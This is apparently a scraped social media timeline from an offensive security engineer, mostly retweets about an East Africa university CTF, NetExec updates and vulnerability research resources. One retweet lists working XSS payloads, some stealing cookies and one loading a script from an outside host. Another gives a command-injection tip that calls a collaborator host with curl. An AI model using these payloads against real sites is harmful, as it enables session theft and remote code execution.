0xB @urchinsec_ | Offensive Security Engineer | @5h4d0wbr0k3r5

Joined April 2022
144 Photos and videos
alienkeric retweeted
I think it's over. I don't think I can do it anymore. My road ends here (hopefully I succeed.)
73
23
731
25,257
alienkeric retweeted
Jun 12
XSS Payloads Collection 👾 1. 3aalert};throw document.cookie 2. "><a nope=""x"" onmouseover="Reflect.get(frames,'ale' 'rt')(Reflect.get(document,'coo' 'kie'))"> 3. "><button popovertarget=x>Click me</button> <input type="hidden" value="y" popover id=x onbeforetoggle=alert(document.cookie)> 4. hello1\"></span><button popovertarget=x>Click me</button><input type=hidden value=y popover id=x onbeforetoggle=prompt(document.cookie)> 5. "><button popovertarget=x>Click me</button> <input type="hidden" value="y" popover id=x onbeforetoggle=alert(document.cookie)> 6. #"></div><a href="javascript:alert(document.domain)"> 7. <div onpointerover="javascript:eval(decodeURIComponent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div> 8. <div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div> 9. \u0022\u003c"><"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} 10. '"><script>alert('bug4y0u')</script> 11. "><div onmouseover="alert('XSS');">Hello :)</div> 12. '"><img src=1 onerror="alert('bug4y0u')"> 13. '"><img src=1 onkarem=1 onerror="alert('bug4y0u')"> 14. "}}}}}}}}}}}}}}"><h1>bug4y0u</h1><svg><circle><set onbegin=prompt(document.cookie) attributename=fill></script> 15. <script/src=//6a.lv></script> 16. 17. 18. '"></script><script>alert(document.cookie)</script> 19. '"accesskey="x" onclick="alert(document.cookie)" x="
2
36
200
7,487
alienkeric retweeted
Replying to @imftxyz @claudeai
I'm using AI (Actual Intelligence)
4
8
103
1,309
alienkeric retweeted

6
50
264
21,457
alienkeric retweeted
Please join us in welcoming @hackinghub_io as an Official Sponsor of the East Africa Intervarsity CTF 2026. Built by hackers, for hackers, HackingHub provides practical training, realistic environments, and hands-on challenges designed to help learners develop skills. #CTF
8
17
1,019
alienkeric retweeted
🗣️🗣️Please join us in welcoming Hack Smater Labs as an Official Sponsor of the East Africa Intervarsity CTF 2026. From Active Directory and web application hacking to cloud security and realistic penetration testing labs, Hack Smarter Labs is helping cybersecurity pros. #CTF
1
8
12
208
alienkeric retweeted
SMB share enumeration via ACLs with NetExec🔥 NetExec now detects share permissions via ACL enumeration, instead of trying to write a file. In addition, we can now detect if a user has indirect access to the share, e.g. by having ACL write permissions! Made by @PytelJack🚀
3
55
268
16,102
alienkeric retweeted
We’re excited to welcome MRE Security as an Official Sponsor of the East Africa Intervarsity CTF 2026. Through education, technical content, career guidance, consulting, and community-driven learning, MRE Security continues to support growing cybersecurity professionals. #CTF
5
7
148
alienkeric retweeted
We’re proud to welcome APISEC University as an Official Sponsor of the East Africa Intervarsity CTF 2026. Together, we’re building opportunities to challenge, grow, and empower the next generation of cybersecurity talent across East Africa. #EastAfricaCTF #CyberSecurity #CTF
1
7
9
340
alienkeric retweeted
May 31
Beginner's intro to Linux kernel fuzzing and vulnerability research (2024, @slava_moskvin_) Part 1: slavamoskvin.com/hunting-bug… Part 2: slavamoskvin.com/finding-bug… Part 3: slavamoskvin.com/finding-bug… #Linux #cybersecurity
2
47
275
10,052
alienkeric retweeted
May 28
List of resources for getting started with IoT/embedded devices vulnerability research (@IamAlch3mist) github.com/IamAlch3mist/Awes… #infosec
2
41
151
6,055
alienkeric retweeted
We have extended deadline for registration Register using the link below: docs.google.com/forms/d/e/1F…
Still thinking about it? Registrations for East Africa Intervarsity CTF 2026 are still open. The challenge isn’t waiting. Represent your university. Build your squad. Enter the arena. PWN • WEB • CRYPTO • FORENSICS • OSINT forms.gle/podha9YSFaq48Qpn7 #EastAfricaCTF #CTF2026
1
5
8
609
alienkeric retweeted
Chat, I don't want to be that guy, but I think Microsoft has really pissed off security researchers and we're approaching the tipping point. This Eclipse guy has really rocked the boat for Microsoft.
118
514
4,332
164,344
alienkeric retweeted
Still thinking about it? Registrations for East Africa Intervarsity CTF 2026 are still open. The challenge isn’t waiting. Represent your university. Build your squad. Enter the arena. PWN • WEB • CRYPTO • FORENSICS • OSINT forms.gle/podha9YSFaq48Qpn7 #EastAfricaCTF #CTF2026
1
7
9
1,074
alienkeric retweeted
?url= ❌SSRF, ✅RCE if you find a parameter which passing url then, before testing SSRF try to test RCE. 1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${ IFS }burp-collab-link;# Join my BugBounty telegram channel: t.me/SehllSec
4
88
623
28,225
alienkeric retweeted
Small QOL update for NetExec: Ctrl C will now immediately exit NetExec without any weird stack traces🚀 However, keep in mind that this still does not exit gracefully, but immediately kills all existing threads. Only do so if necessary. Made by @T1erno_
1
12
68
4,987
alienkeric retweeted
May 15
Replying to @trailofbits
@trailofbits Claude Code skills for security research, vulnerability detection and more github.com/trailofbits/skill… #infosec #llm
4
25
188
9,247
alienkeric retweeted
Lets Gooo!!!!! This is gonna be 🔥🔥🔥🔥
EastAfrica InterVarsity CTF 2026 is open for registration. One team per university. Five players. Two rounds. Three winners. Pick your five wisely, your uni's rep depends on it. Registration closes 31st May. 🔗 forms.gle/pLtpyJyLtmSbZbv46 #EAInterVarsityCTF #CTF #p3rf3ctr00t #ZoneLab
1
5
13
278